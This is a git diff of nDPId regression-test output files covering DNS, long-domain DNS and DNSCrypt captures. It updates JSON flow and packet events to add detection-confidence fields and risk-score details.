 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744019230,"flow_last_seen":1618744019230,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1618744019230,"l3_proto":"ip4","src_ip":"173.147.108.174","dst_ip":"244.187.95.1","src_port":18427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1618744019230,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1618744019230,"pkt":"AAAAAAAAAAEAVKCBCABFAABAAABAAEARzK6tk2yu9LtfAUf7ADUALMGVd\/wJAAAAAAEAAAAAAzIxNgI1OAMyMDIBNAAAAQABAAAAAAAA"}
-00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744019230,"flow_last_seen":1618744019230,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1618744019230,"l3_proto":"ip4","src_ip":"173.147.108.174","dst_ip":"244.187.95.1","src_port":18427,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"216.58.202.4","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744019230,"flow_last_seen":1618744019230,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1618744019230,"l3_proto":"ip4","src_ip":"173.147.108.174","dst_ip":"244.187.95.1","src_port":18427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"216.58.202.4","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1618744019235,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1618744019235,"pkt":"AAAAAAAAAAEAVKCBCABFAAAoAABAADsR0cb0u18BrZNsrgA1R\/sAFEgWd\/yJhAAAAAAAAAAAAAA="}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1618744019230,"flow_last_seen":1618744019235,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1618744019235,"l3_proto":"ip4","src_ip":"173.147.108.174","dst_ip":"244.187.95.1","src_port":18427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00165{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"dns_invert_query.pcapng","alias":"nDPId-test","total-events-serialized":7}
@@ -13,10 +13,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594887 bytes
-~~ total memory freed........: 4594887 bytes
-~~ total allocations/frees...: 99555/99555
+~~ total memory allocated....: 4679840 bytes
+~~ total memory freed........: 4679840 bytes
+~~ total allocations/frees...: 101145/101145
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 170 chars
-~~ json string max len.......: 748 chars
-~~ json string avg len.......: 520 chars
+~~ json string max len.......: 774 chars
+~~ json string avg len.......: 532 chars
diff --git a/test/results/dns_long_domainname.pcap.out b/test/results/dns_long_domainname.pcap.out
index fd200b829..d7d2d1c54 100644
--- a/test/results/dns_long_domainname.pcap.out
+++ b/test/results/dns_long_domainname.pcap.out
@@ -1,10 +1,10 @@
 00451{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dns_long_domainname.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1599686652555,"flow_last_seen":1599686652555,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1599686652555,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1599686652555,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1599686652555,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZsREAAEAR9yLAqAGoCAgICP8fADUARcOpi1QBAAABAAAAAAAABmdtcjAyYwIxNgEwDGZoa2Zoc2RrZmhzawZ0dW5uZWwHZXhhbXBsZQNjb20AAAEAAQ=="}
-00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1599686652555,"flow_last_seen":1599686652555,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1599686652555,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"gmr02c.16.0.fhkfhsdkfhsk.tunnel.example.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1599686652555,"flow_last_seen":1599686652555,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1599686652555,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"gmr02c.16.0.fhkfhsdkfhsk.tunnel.example.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1599686652578,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":159,"pkt_l4_len":125,"ts_msec":1599686652578,"pkt":"KDc3AG3IEBMx8Tl2CABFAACR3WoAAHYRlJEICAgIwKgBqAA1\/x8AfQAAi1SBgwABAAAAAQAABmdtcjAyYwIxNgEwDGZoa2Zoc2RrZmhzawZ0dW5uZWwHZXhhbXBsZQNjb20AAAEAAcAsAAYAAQAABcMALAJucwVpY2FubgNvcmcAA25vYwNkbnPATHhn+r4AABwgAAAOEAASdQAAAA4Q"}
-00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1599686652555,"flow_last_seen":1599686652578,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1599686652578,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"gmr02c.16.0.fhkfhsdkfhsk.tunnel.example.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1599686652555,"flow_last_seen":1599686652578,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1599686652578,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1599686652555,"flow_last_seen":1599686652578,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1599686652578,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"gmr02c.16.0.fhkfhsdkfhsk.tunnel.example.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1599686652555,"flow_last_seen":1599686652578,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1599686652578,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
 00166{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"dns_long_domainname.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2/2
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594887 bytes
-~~ total memory freed........: 4594887 bytes
-~~ total allocations/frees...: 99555/99555
+~~ total memory allocated....: 4679840 bytes
+~~ total memory freed........: 4679840 bytes
+~~ total allocations/frees...: 101145/101145
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 171 chars
-~~ json string max len.......: 786 chars
-~~ json string avg len.......: 543 chars
+~~ json string max len.......: 812 chars
+~~ json string avg len.......: 556 chars
diff --git a/test/results/dnscrypt-v1-and-resolver-pings.pcap.out b/test/results/dnscrypt-v1-and-resolver-pings.pcap.out
index 37a4aa2ce..30fa3848e 100644
--- a/test/results/dnscrypt-v1-and-resolver-pings.pcap.out
+++ b/test/results/dnscrypt-v1-and-resolver-pings.pcap.out
@@ -1,88 +1,88 @@
 00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946735705348,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAAIcCf9AAL0Rd68KAAABlTjkLZX0AbsCCDw8f0cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02415{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946735705348,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAAXcCgAgAL0Rk+4KAAABlTjkLbKaAbsGBGxVf0QBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00425{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAABQCgAAub0RuMEKAAABlTjkLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":3,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946735705348,"flow_last_seen":946735705348,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946735705348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02415{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946735705348,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946735705348,"pkt":"REREREREZmZmZmZmCABFAAXcCgEgAL0Rk+0KAAABlTjkLYqnAbsGBJRGf0YBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA